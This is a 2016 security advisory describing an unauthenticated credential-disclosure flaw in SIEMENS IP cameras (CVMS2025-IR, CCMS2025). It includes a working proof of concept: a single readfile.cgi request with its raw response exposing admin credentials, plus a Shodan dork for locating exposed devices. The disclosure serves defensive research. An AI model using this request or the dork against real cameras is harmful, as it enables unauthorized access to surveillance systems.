Advisory Information
Title: SIEMENS IP-Camera Unauthenticated Remote Credentials Disclosure
Vendor Homepage: https:// com
Remotely Exploitable: Yes
Versions Affected: x.
Tested on Camera types: CVMS2025-IR, CCMS2025 (Camera type)
Reference for CCMS2025: https://w5. com/web/cz/cz/corporate/portal/home/produkty_a_sluzby/IBT/pozarni_a_bezpecnostni_systemy/cctv/ip_kamery/Documents/023_CCIS1425_A6V10333969_en.pdf
Vulnerability: Username / Password Disclosure (Critical / High)
Shodan Dork: title:"SIEMENS IP-Camera"
Date: 16/08/2016
Author: Yakir Wizman (https:// com/in/yakirwizman)

CREDIT
This vulnerability was identified during a penetration test by Yakir Wizman.

Description
SIEMENS IP-Camera (CVMS2025-IR + CCMS2025) allows an unauthenticated user to disclose the username and password remotely with a simple request made from a browser.

Proof-of-Concept
Simply go to the following URL:

    http://host:port/cgi-bin/readfile.cgi?query=ADMINID

This should return JavaScript variables that contain the credentials and other configuration variables:

    var Adm_ID = "admin"
    var Adm_Pass1 = “admin”
    var Adm_Pass2 = “admin”
    var Language = “en”
    var Logoff_Time = "0"

Request:

    GET /cgi-bin/readfile.cgi?query=ADMINID HTTP/1.1
    Host: host:port
    Connection: close

Response:

    HTTP/1.0 200 OK
    Connection: close
    Content-type: text/html

    var Adm_ID = "admin"
    var Adm_Pass1 = “admin”
    var Adm_Pass2 = “admin”
    var Language = “en”
    var Logoff_Time = "0"

Login http://host:port/cgi-bin/chklogin.

SOLUTION
Contact the vendor for further information regarding the proper mitigation of this vulnerability.